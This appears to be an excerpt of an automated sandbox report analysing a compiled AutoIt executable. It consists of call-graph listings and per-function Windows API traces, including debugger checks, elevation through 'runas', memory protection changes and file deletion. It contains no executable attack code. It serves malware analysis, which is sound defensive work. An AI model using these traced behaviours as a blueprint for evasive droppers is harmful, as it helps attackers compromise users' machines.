103758->103754 103758->103756 103758->103757 103759 396e8f 59 API calls 103758->103759 103758->103761 103762 3809d6 103758->103762 103765 34a55a 103758->103765 103792 34c8c0 331 API calls 2 library calls 103758->103792 103793 34b900 60 API calls Mailbox 103758->103793 103759->103758 103760 347de1 59 API calls 103760->103771 103809 3a9e4a 89 API calls 4 library calls 103762->103809 103810 3a9e4a 89 API calls 4 library calls 103764->103810 103808 3a9e4a 89 API calls 4 library calls 103765->103808 103768 34b2b6 103797 34f6a3 331 API calls 103768->103797 103770 349ea0 331 API calls 103770->103771 103771->103758 103771->103760 103771->103761 103771->103768 103771->103770 103772 38086a 103771->103772 103774 380878 103771->103774 103776 38085c 103771->103776 103777 34b21c 103771->103777 103779 360db6 59 API calls Mailbox 103771->103779 103781 396e8f 59 API calls 103771->103781 103783 34b525 103771->103783 103786 3bdf37 103771->103786 103789 3bdf23 103771->103789 103794 349c90 59 API calls Mailbox 103771->103794 103798 3bc193 85 API calls 2 library calls 103771->103798 103799 3bc2e0 96 API calls Mailbox 103771->103799 103800 3a7956 59 API calls Mailbox 103771->103800 103801 3bbc6b 331 API calls Mailbox 103771->103801 103802 39617e 59 API calls Mailbox 103771->103802 103806 349c90 59 API calls Mailbox 103772->103806 103807 3a9e4a 89 API calls 4 library calls 103774->103807 103776->103761 103805 39617e 59 API calls Mailbox 103776->103805 103795 349d3c 60 API calls Mailbox 103777->103795 103779->103771 103780 34b22d 103796 349d3c 60 API calls Mailbox 103780->103796 103781->103771 103804 3a9e4a 89 API calls 4 library calls 103783->103804 103811 3bcadd 103786->103811 103788 3bdf47 103788->103771 103790 3bcadd 130 API calls 103789->103790 103791 3bdf33 103790->103791 103791->103771 103792->103758 103793->103758 103794->103771 103795->103780 103796->103768 103797->103783 103798->103771 103799->103771 103800->103771 103801->103771 103802->103771 103803->103750 103804->103776 103805->103761 103806->103776 103807->103776 103808->103761 103809->103764 103810->103761 103812 349837 84 API calls 103811->103812 103813 3bcb1a 103812->103813 103837 3bcb61 Mailbox 103813->103837 103849 3bd7a5 103813->103849 103815 3bcdb9 103816 3bcf2e 103815->103816 103820 3bcdc7 103815->103820 103888 3bd8c8 92 API calls Mailbox 103816->103888 103819 3bcf3d 103819->103820 103821 3bcf49 103819->103821 103862 3bc96e 103820->103862 103821->103837 103822 349837 84 API calls 103839 3bcbb2 Mailbox 103822->103839 103827 3bce00 103877 360c08 103827->103877 103830 3bce1a 103883 3a9e4a 89 API calls 4 library calls 103830->103883 103831 3bce33 103833 3492ce 59 API calls 103831->103833 103835 3bce3f 103833->103835 103834 3bce25 GetCurrentProcess TerminateProcess 103834->103831 103836 349050 59 API calls 103835->103836 103838 3bce55 103836->103838 103837->103788 103848 3bce7c 103838->103848 103884 348d40 59 API calls Mailbox 103838->103884 103839->103815 103839->103822 103839->103837 103881 3bfbce 59 API calls 2 library calls 103839->103881 103882 3bcfdf 61 API calls 2 library calls 103839->103882 103841 3bcfa4 103841->103837 103845 3bcfb8 FreeLibrary 103841->103845 103842 3bce6b 103885 3bd649 107 API calls _free 103842->103885 103845->103837 103848->103841 103886 348d40 59 API calls Mailbox 103848->103886 103887 349d3c 60 API calls Mailbox 103848->103887 103889 3bd649 107 API calls _free 103848->103889 103850 347e4f 59 API calls 103849->103850 103851 3bd7c0 CharLowerBuffW 103850->103851 103890 39f167 103851->103890 103855 347667 59 API calls 103856 3bd7f9 103855->103856 103857 34784b 59 API calls 103856->103857 103858 3bd810 103857->103858 103859 347d2c 59 API calls 103858->103859 103860 3bd81c Mailbox 103859->103860 103861 3bd858 Mailbox 103860->103861 103897 3bcfdf 61 API calls 2 library calls 103860->103897 103861->103839 103863 3bc989 103862->103863 103864 3bc9de 103862->103864 103865 360db6 Mailbox 59 API calls 103863->103865 103868 3bda50 103864->103868 103867 3bc9ab 103865->103867 103866 360db6 Mailbox 59 API calls 103866->103867 103867->103864 103867->103866 103869 3bdc79 Mailbox 103868->103869 103876 3bda73 _strcat _wcscpy __wsetenvp 103868->103876 103869->103827 103870 349b3c 59 API calls 103870->103876 103871 349be6 59 API calls 103871->103876 103872 349b98 59 API calls 103872->103876 103873 349837 84 API calls 103873->103876 103874 36571c 58 API calls __crtCompareStringA_stat 103874->103876 103876->103869 103876->103870 103876->103871 103876->103872 103876->103873 103876->103874 103900 3a5887 61 API calls 2 library calls 103876->103900 103879 360c1d 103877->103879 103878 360cb5 VirtualProtect 103880 360c83 103878->103880 103879->103878 103879->103880 103880->103830 103880->103831 103881->103839 103882->103839 103883->103834 103884->103842 103885->103848 103886->103848 103887->103848 103888->103819 103889->103848 103891 39f192 __wsetenvp 103890->103891 103892 39f1d1 103891->103892 103894 39f1c7 103891->103894 103896 39f278 103891->103896 103892->103855 103892->103860 103894->103892 103898 3478c4 61 API calls 103894->103898 103896->103892 103899 3478c4 61 API calls 103896->103899 103897->103861 103898->103894 103899->103896 103900->103876 103901 c71198 103915 c6ede8 103901->103915 103903 c71252 103918 c71088 103903->103918 103921 c72278 GetPEB 103915->103921 103917 c6f473 103917->103903 103919 c71091 Sleep 103918->103919 103920 c7109f 103919->103920 103922 c722a2 103921->103922 103922->103917

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00343B68
                                                        • IsDebuggerPresent.KERNEL32 ref: 00343B7A
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,004052F8,004052E0,?,?), ref: 00343BEB
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                          • Part of subcall function 0035092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343C14,004052F8,?,?,?), ref: 0035096E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00343C6F
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003F7770,00000010), ref: 0037D281
                                                        • SetCurrentDirectoryW.KERNEL32(?,004052F8,?,?,?), ref: 0037D2B9
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003F4260,004052F8,?,?,?), ref: 0037D33F
                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 0037D346
                                                          • Part of subcall function 00343A46: GetSysColorBrush.USER32(0000000F), ref: 00343A50
                                                          • Part of subcall function 00343A46: LoadCursorW.USER32(00000000,00007F00), ref: 00343A5F
                                                          • Part of subcall function 00343A46: LoadIconW.USER32(00000063), ref: 00343A76
                                                          • Part of subcall function 00343A46: LoadIconW.USER32(000000A4), ref: 00343A88
                                                          • Part of subcall function 00343A46: LoadIconW.USER32(000000A2), ref: 00343A9A
                                                          • Part of subcall function 00343A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00343AC0
                                                          • Part of subcall function 00343A46: RegisterClassExW.USER32(?), ref: 00343B16
                                                          • Part of subcall function 003439D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00343A03
                                                          • Part of subcall function 003439D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343A24
                                                          • Part of subcall function 003439D5: ShowWindow.USER32(00000000,?,?), ref: 00343A38
                                                          • Part of subcall function 003439D5: ShowWindow.USER32(00000000,?,?), ref: 00343A41
                                                          • Part of subcall function 0034434A: _memset.LIBCMT ref: 00344370
                                                          • Part of subcall function 0034434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00344415
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                        • String ID: This is a third-party compiled AutoIt script.$runas$%=
                                                        • API String ID: 529118366-4029254884
                                                        • Opcode ID: 1fc482806fd91a37aa6a1a33f365638abde5a00cc55df753e57d8058212cf12d
                                                        • Instruction ID: 1700416a66f215588f0b7e083e26f259becec2961cf7c73281ef6e0e1a225c1d
                                                        • Opcode Fuzzy Hash: 1fc482806fd91a37aa6a1a33f365638abde5a00cc55df753e57d8058212cf12d
                                                        • Instruction Fuzzy Hash: 5351AE31908148AEDB13ABB49C45EEE7BB9EF45700F0080B9E451BF1A2DB746A06CF25

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1037 3449a0-344a00 call 347667 GetVersionExW call 347bcc 1042 344a06 1037->1042 1043 344b0b-344b0d 1037->1043 1045 344a09-344a0e 1042->1045 1044 37d767-37d773 1043->1044 1046 37d774-37d778 1044->1046 1047 344a14 1045->1047 1048 344b12-344b13 1045->1048 1050 37d77b-37d787 1046->1050 1051 37d77a 1046->1051 1049 344a15-344a4c call 347d2c call 347726 1047->1049 1048->1049 1059 37d864-37d867 1049->1059 1060 344a52-344a53 1049->1060 1050->1046 1053 37d789-37d78e 1050->1053 1051->1050 1053->1045 1055 37d794-37d79b 1053->1055 1055->1044 1057 37d79d 1055->1057 1061 37d7a2-37d7a5 1057->1061 1062 37d880-37d884 1059->1062 1063 37d869 1059->1063 1060->1061 1064 344a59-344a64 1060->1064 1065 344a93-344aaa GetCurrentProcess IsWow64Process 1061->1065 1066 37d7ab-37d7c9 1061->1066 1067 37d886-37d88f 1062->1067 1068 37d86f-37d878 1062->1068 1071 37d86c 1063->1071 1072 37d7ea-37d7f0 1064->1072 1073 344a6a-344a6c 1064->1073 1069 344aac 1065->1069 1070 344aaf-344ac0 1065->1070 1066->1065 1074 37d7cf-37d7d5 1066->1074 1067->1071 1077 37d891-37d894 1067->1077 1068->1062 1069->1070 1078 344ac2-344ad2 call 344b37 1070->1078 1079 344b2b-344b35 GetSystemInfo 1070->1079 1071->1068 1075 37d7f2-37d7f5 1072->1075 1076 37d7fa-37d800 1072->1076 1080 37d805-37d811 1073->1080 1081 344a72-344a75 1073->1081 1082 37d7d7-37d7da 1074->1082 1083 37d7df-37d7e5 1074->1083 1075->1065 1076->1065 1077->1068 1094 344ad4-344ae1 call 344b37 1078->1094 1095 344b1f-344b29 GetSystemInfo 1078->1095 1086 344af8-344b08 1079->1086 1087 37d813-37d816 1080->1087 1088 37d81b-37d821 1080->1088 1084 37d831-37d834 1081->1084 1085 344a7b-344a8a 1081->1085 1082->1065 1083->1065 1084->1065 1093 37d83a-37d84f 1084->1093 1090 37d826-37d82c 1085->1090 1091 344a90 1085->1091 1087->1065 1088->1065 1090->1065 1091->1065 1096 37d851-37d854 1093->1096 1097 37d859-37d85f 1093->1097 1102 344ae3-344ae7 GetNativeSystemInfo 1094->1102 1103 344b18-344b1d 1094->1103 1098 344ae9-344aed 1095->1098 1096->1065 1097->1065 1098->1086 1101 344aef-344af2 FreeLibrary 1098->1101 1101->1086 1102->1098 1103->1102
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 003449CD
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                        • GetCurrentProcess.KERNEL32(?,003CFAEC,00000000,00000000,?), ref: 00344A9A
                                                        • IsWow64Process.KERNEL32(00000000), ref: 00344AA1
                                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00344AE7
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00344AF2
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00344B23
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00344B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                        • String ID:
                                                        • API String ID: 1986165174-0
                                                        • Opcode ID: 5b6dab150a132dcd6c185d0bf0df8a870179ebffcf9c141c51604b872b41e0dd
                                                        • Instruction ID: c7623902c5a1b4191a22d773389135e20053e249b5fd4afdabb84cd0e5cf7963
                                                        • Opcode Fuzzy Hash: 5b6dab150a132dcd6c185d0bf0df8a870179ebffcf9c141c51604b872b41e0dd
                                                        • Instruction Fuzzy Hash: A691B5319897C4DEC733DB6885506AAFFF9AF2A300B484D6DD0CB9BA41D624F508C75A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1104 344e89-344ea1 CreateStreamOnHGlobal 1105 344ec1-344ec6 1104->1105 1106 344ea3-344eba FindResourceExW 1104->1106 1107 37d933-37d942 LoadResource 1106->1107 1108 344ec0 1106->1108 1107->1108 1109 37d948-37d956 SizeofResource 1107->1109 1108->1105 1109->1108 1110 37d95c-37d967 LockResource 1109->1110 1110->1108 1111 37d96d-37d98b 1110->1111 1111->1108
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00344D8E,?,?,00000000,00000000), ref: 00344E99
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00344D8E,?,?,00000000,00000000), ref: 00344EB0
                                                        • LoadResource.KERNEL32(?,00000000,?,?,00344D8E,?,?,00000000,00000000,?,?,?,?,?,?,00344E2F), ref: 0037D937
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00344D8E,?,?,00000000,00000000,?,?,?,?,?,?,00344E2F), ref: 0037D94C
                                                        • LockResource.KERNEL32(00344D8E,?,?,00344D8E,?,?,00000000,00000000,?,?,?,?,?,?,00344E2F,00000000), ref: 0037D95F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: df428549780473ae5099fb05300430489adda7a9b2b3e73b0600e9adeedf8688
                                                        • Instruction ID: b6dd185724a74d3bbf9cb34d5e5d5fcd9e818217cd347a3bd262102aefed2211
                                                        • Opcode Fuzzy Hash: df428549780473ae5099fb05300430489adda7a9b2b3e73b0600e9adeedf8688
                                                        • Instruction Fuzzy Hash: FE111875240701AFE7228B65EC48F67BBBEEBC5B51F208668F506DA650DB61E8408A60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: pb@$%=
                                                        • API String ID: 3964851224-3470441875
                                                        • Opcode ID: 3d14c3944194e6513505b40abcb0a0a17e799f00b271b683948eb39456d328cc
                                                        • Instruction ID: 481e264dbd5bb8c9089f406caebbd2513f123ee6f24e522e6fac4de3cf6eea90
                                                        • Opcode Fuzzy Hash: 3d14c3944194e6513505b40abcb0a0a17e799f00b271b683948eb39456d328cc
                                                        • Instruction Fuzzy Hash: 39928A706083418FD726DF24C480B2BB7E5BF85304F15896DE88A9B762D776EC49CB92
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,0037E398), ref: 003A446A
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 003A447B
                                                        • FindClose.KERNEL32(00000000), ref: 003A448B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 321a08201eea30abc9f308c6d3b7d613a0e5e02e0b9c4eb4d9539a13300a37d8
                                                        • Instruction ID: 85dc5cec80620de1d7cc77f9ebd89936dbc02378f172d079e2a88bc945faba1f
                                                        • Opcode Fuzzy Hash: 321a08201eea30abc9f308c6d3b7d613a0e5e02e0b9c4eb4d9539a13300a37d8
                                                        • Instruction Fuzzy Hash: 76E0D8364145006B82116B38EC0D8E9775DDF4A335F100B15F835C10D0E7F4A9009695
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00350A5B
                                                        • timeGetTime.WINMM ref: 00350D16
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00350E53
                                                        • Sleep.KERNEL32(0000000A), ref: 00350E61
                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00350EFA
                                                        • DestroyWindow.USER32 ref: 00350F06
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00350F20
                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00384E83
                                                        • TranslateMessage.USER32(?), ref: 00385C60
                                                        • DispatchMessageW.USER32(?), ref: 00385C6E
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00385C82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb@$pb@$pb@$pb@
                                                        • API String ID: 4212290369-4030950617
                                                        • Opcode ID: 0a583541264c54e77a5698803ac46bf59e67277faeb66b54f71ecd189a017b6d
                                                        • Instruction ID: 215b09dc95ad39c430e1764f603e0ab540e6edb13fdc9092a3eb9bcbef16b15e
                                                        • Opcode Fuzzy Hash: 0a583541264c54e77a5698803ac46bf59e67277faeb66b54f71ecd189a017b6d
                                                        • Instruction Fuzzy Hash: 1FB2D370608741DFD72AEF24C885FAAB7E5FF84304F15495DE8999B2A1CB71E848CB42

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 003A8F5F: __time64.LIBCMT ref: 003A8F69
                                                          • Part of subcall function 00344EE5: _fseek.LIBCMT ref: 00344EFD
                                                        • __wsplitpath.LIBCMT ref: 003A9234
                                                          • Part of subcall function 003640FB: __wsplitpath_helper.LIBCMT ref: 0036413B
                                                        • _wcscpy.LIBCMT ref: 003A9247
                                                        • _wcscat.LIBCMT ref: 003A925A
                                                        • __wsplitpath.LIBCMT ref: 003A927F
                                                        • _wcscat.LIBCMT ref: 003A9295
                                                        • _wcscat.LIBCMT ref: 003A92A8
                                                          • Part of subcall function 003A8FA5: _memmove.LIBCMT ref: 003A8FDE
                                                          • Part of subcall function 003A8FA5: _memmove.LIBCMT ref: 003A8FED
                                                        • _wcscmp.LIBCMT ref: 003A91EF
                                                          • Part of subcall function 003A9734: _wcscmp.LIBCMT ref: 003A9824
                                                          • Part of subcall function 003A9734: _wcscmp.LIBCMT ref: 003A9837
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003A9452
                                                        • _wcsncpy.LIBCMT ref: 003A94C5
                                                        • DeleteFileW.KERNEL32(?,?), ref: 003A94FB
                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A9511
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A9522
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A9534
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1500180987-0
                                                        • Opcode ID: 30e4a146e75776c87abdfbb6a3a1ea3a796f65dacf2e76c48885312bb2accb9c
                                                        • Instruction ID: 332622cc6f15c6e1f8b13a0fc5100b6fcddabe610304274c89d22d402cdeb96e
                                                        • Opcode Fuzzy Hash: 30e4a146e75776c87abdfbb6a3a1ea3a796f65dacf2e76c48885312bb2accb9c
                                                        • Instruction Fuzzy Hash: 07C12BB1D00219AADF26DF95CC85EDEB7BDEF45310F0044AAF609EA151DB309A448F65

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00343074
                                                        • RegisterClassExW.USER32(00000030), ref: 0034309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                                        • LoadIconW.USER32(000000A9), ref: 003430F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: c7dd36887b27c74ec3e857c6aaf86c0cb6a81343a1a50a324a7bcf2f33a83bf6
                                                        • Instruction ID: 4902571e3167f6fcd604d00398bfce160ad81ef5215cad01a9b44436e18f14e5
                                                        • Opcode Fuzzy Hash: c7dd36887b27c74ec3e857c6aaf86c0cb6a81343a1a50a324a7bcf2f33a83bf6
                                                        • Instruction Fuzzy Hash: D13178B2800358AFDB02DFA4D888ADABFF5FB09310F14816EE580EA2A0D3B51554CF91

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00343074
                                                        • RegisterClassExW.USER32(00000030), ref: 0034309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                                        • LoadIconW.USER32(000000A9), ref: 003430F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 5d8a3ff9f714d074fd46a6d4e2476a310b4eeeb97434b380332f757179bb25bf
                                                        • Instruction ID: 6786a2aae98f86858b020351409db048cba1b9126dc7bc679877eb2932daf379
                                                        • Opcode Fuzzy Hash: 5d8a3ff9f714d074fd46a6d4e2476a310b4eeeb97434b380332f757179bb25bf
                                                        • Instruction Fuzzy Hash: 5A21C7B6901718AFDB01EFA4ED49BDEBBF9FB08700F00812AF911E62A0D7B155548F95

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00344706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004052F8,?,003437AE,?), ref: 00344724
                                                          • Part of subcall function 0036050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00347165), ref: 0036052D
